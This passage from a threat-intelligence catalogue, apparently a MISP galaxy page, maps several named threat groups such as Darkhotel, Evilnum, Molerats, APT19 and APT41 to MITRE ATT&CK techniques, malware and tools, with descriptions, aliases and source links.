https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf
https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/
https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

Darkhotel - G0012

[Darkhotel](https://attack.mitre.org/groups/G0012) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group’s name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://attack.mitre.org/groups/G0012) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft Digital Defense FY20 Sept 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Darkhotel - G0012"

Darkhotel - G0012 is also known as:

Darkhotel
DUBNIUM

View relationships graph

Darkhotel - G0012 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002" with estimative-language:likelihood-probability="almost-certain"

Table 4512. Table References
Links
https://attack.mitre.org/groups/G0012
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf
https://securelist.com/darkhotels-attacks-in-2015/71713/
https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf
https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/
https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/
https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

Evilnum - G0120

[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Evilnum - G0120"

Evilnum - G0120 is also known as:

Evilnum

View relationships graph

Evilnum - G0120 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="More_eggs - S0284" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="EVILNUM - S0568" with estimative-language:likelihood-probability="almost-certain"

Table 4513. Table References
Links
https://attack.mitre.org/groups/G0120
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

Molerats - G0021

[Molerats](https://attack.mitre.org/groups/G0021) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group’s victims have primarily been in the Middle East, Europe, and the United States.(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Molerats - G0021"

Molerats - G0021 is also known as:

Molerats
Operation Molerats
Gaza Cybergang

View relationships graph

Molerats - G0021 has relationships with:

similar: misp-galaxy:threat-actor="Molerats" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DustySky - S0062" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Spark - S0543" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DropBook - S0547" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SharpStage - S0546" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MoleNet - S0553" with estimative-language:likelihood-probability="almost-certain"

Table 4514. Table References
Links
https://attack.mitre.org/groups/G0021
https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf
http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf
https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf
https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

admin@338 - G0018

[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-intrusion-set="admin@338 - G0018"

admin@338 - G0018 is also known as:

admin@338

View relationships graph

admin@338 - G0018 has relationships with:

similar: misp-galaxy:threat-actor="Temper Panda" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BUBBLEWRAP - S0043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="LOWBALL - S0042" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 4515. Table References
Links
https://attack.mitre.org/groups/G0018
https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

APT19 - G0073

[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China’s Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)

The tag is: misp-galaxy:mitre-intrusion-set="APT19 - G0073"

APT19 - G0073 is also known as:

APT19
Codoso
C0d0so0
Codoso Team
Sunshop Group

View relationships graph

APT19 - G0073 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4516. Table References
Links
https://attack.mitre.org/groups/G0073
https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html
https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/
https://www.fireeye.com/current-threats/apt-groups.html#apt19
https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/
https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059

Mofang - G0103

[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim’s infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-intrusion-set="Mofang - G0103"

Mofang - G0103 is also known as:

Mofang

View relationships graph

Mofang - G0103 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ShimRatReporter - S0445" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ShimRat - S0444" with estimative-language:likelihood-probability="almost-certain"

Table 4517. Table References
Links
https://attack.mitre.org/groups/G0103
https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

APT41 - G0096

[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

The tag is: misp-galaxy:mitre-intrusion-set="APT41 - G0096"

APT41 - G0096 is also known as:

APT41
WICKED PANDA

View relationships graph

APT41 - G0096 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="njRAT - S0385" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ROCKBOOT - S0112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ZxShell - S0412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="BITSAdmin - S0190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MESSAGETAP - S0443" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Winnti for Linux - S0430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ShadowPad - S0596" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4518. Table References
Links
https://attack.mitre.org/groups/G0096
https://content.fireeye.com/apt-41/rpt-apt41
https://blog.group-ib.com/colunmtk_apt41
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

Sharpshooter - G0104

Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Sharpshooter - G0104"

Sharpshooter - G0104 is also known as:

Sharpshooter

View relationships graph

Sharpshooter - G0104 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
